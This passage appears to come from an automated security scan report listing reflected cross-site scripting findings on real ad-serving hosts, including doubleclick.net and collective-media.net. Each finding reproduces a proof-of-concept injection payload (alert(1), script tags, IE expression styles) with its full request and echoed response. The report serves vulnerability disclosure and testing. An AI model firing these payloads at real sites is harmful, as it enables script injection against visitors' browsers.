User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.boston/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25988'-alert(1)-'2536406d3ba was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?25988'-alert(1)-'2536406d3ba HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload def1c'-alert(1)-'c357eca95f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.yearbookdef1c'-alert(1)-'c357eca95f6/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8539
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10222814201_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbookdef1c'-alert(1)-'c357eca95f6&size=300x250&imp_id=cm-10222814201_1311271253,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbookdef1c%27-alert%281%29-%27c357eca95f
...[SNIP]...

3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://a.collective-media.net
Path:	/cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fa4e(a)a8c98bec559 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=5fa4e(a)a8c98bec559 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:52 GMT
Content-Length: 8446
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:52 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
s/collective",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:5fa4e(a)a8c98bec559,
uqid:bap_rnd,
cps:'cm,bz'
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.fsdn.com
Path:	/adops/google/rev2/afc/css/

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 571d6<script>alert(1)</script>cb7344dcae0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adops/google/rev2/afc/css/?fn=afc_sf_imu_grey_x1.css&id=fad72571d6<script>alert(1)</script>cb7344dcae0&class=ad HTTP/1.1
Host: a.fsdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/css; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Sat, 06 Aug 2011 04:42:34 GMT
Date: Sat, 23 Jul 2011 04:42:34 GMT
Content-Length: 1274
Connection: close

#fad72571d6<script>alert(1)</script>cb7344dcae0 {
   width:300px;
   height:250px;
}

#fad72571d6<script>alert(1)</script>cb7344dcae0 div.google_afc {
   width:300px;
   height:250px;
   text-align:center;

...[SNIP]...

3.20. http://a.netmng.com/hic/ [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b532"><script>alert(1)</script>1c809b7e17d was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:43 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:43 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRflztgED0I2C1qSGxfKQ30JhG6I9%2B82AcGCSG4fp0PY4TBZ4S3MlrjOmmteXUAUoOdN7dG7kiWhSQrDQPTbLOV; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com
Content-Length: 1781
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d;?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.21. http://a.netmng.com/hic/ [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb57"><script>alert(1)</script>d7a9c0aaf4c was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:43 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Tue, 19 Jul 2011 18:01:43 GMT
Last-Modified: Tue, 19 Jul 2011 18:01:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=JLLF4eT1WhcY7TzYRhauNik%2BFECnwub8U63nHW2DWuRvPrOi2h1nnLXEbLzAx%2FMbymvWgkgSDWaJ1NnSqwvsCipe9M%2B%2F6dyjEczknUspeVthiWdr3v5YG6tiKaLtu61l; expires=Fri, 20-Jan-2012 18:01:43 GMT; path=/
Set-Cookie: evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:43 GMT; path=/; domain=.netmng.com
Content-Length: 1781
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271303;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http:/
...[SNIP]...
k?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394438fb57"><script>alert(1)</script>d7a9c0aaf4c;?">
...[SNIP]...

3.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43e13"style="x:expression(alert(1))"6815619fe6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;&43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 422
Date: Sat, 23 Jul 2011 04:31:24 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;&43e13"style="x:expression(alert(1))"6815619fe6d=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e was submitted in the u parameter. This input was echoed as da5f6"style="x:expression(alert(1))"3f1246fe48e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 419
Date: Sat, 23 Jul 2011 04:31:19 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;da5f6"style="x:expression(alert(1))"3f1246fe48e;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N2883.132636.QUADRANTONE.COM/B5629721.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a0c9'-alert(1)-'10a8566025f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N2883.132636.QUADRANTONE.COM/B5629721.18;sz=8a0c9'-alert(1)-'10a8566025f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36606
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:48:38 GMT
Expires: Sat, 23 Jul 2011 13:48:38 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=3149779;stragg=1;v=1;pid=65553367;aid=242867278;ko=0;cid=42426448;rid=42444235;rv=2;rn=2872633;";
this.swfParams = 'src=3149779&rv=2&rid=42444235&=8a0c9'-alert(1)-'10a8566025f&';
this.renderingId = "42444235";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lfs2.lifescript/conditions

Issue detail

The value of the path request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf736'%3balert(1)//b8265541d86 was submitted in the path parameter. This input was echoed as bf736';alert(1)//b8265541d86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/lfs2.lifescript/conditions;path=bf736'%3balert(1)//b8265541d86 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 286
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 19:22:58 GMT
Expires: Thu, 21 Jul 2011 19:22:58 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/y;44306;0-0;0;31210306;3454-728/90;0/0/0;;~okv=;path=bf736';alert(1)//b8265541d86;~sscs=%3f"><img src="http:/
...[SNIP]...

3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61790'-alert(1)-'fcbfe393cb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;ord=2861515760451365?&61790'-alert(1)-'fcbfe393cb3=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 341
Date: Sat, 23 Jul 2011 04:42:43 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;;61790'-alert(1)-'fcbfe393cb3=1;~sscs=%3f">
...[SNIP]...

3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/ostg.sourceforge/cons_none_p71_text

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc625'%3balert(1)//e12694d7dfb was submitted in the pg parameter. This input was echoed as cc625';alert(1)//e12694d7dfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/ostg.sourceforge/cons_none_p71_text;pg=cc625'%3balert(1)//e12694d7dfb HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:42:39 GMT
Expires: Sat, 23 Jul 2011 04:42:39 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=cc625';alert(1)//e12694d7dfb;~sscs=%3f"><img src="http://s0.2mdn
...[SNIP]...

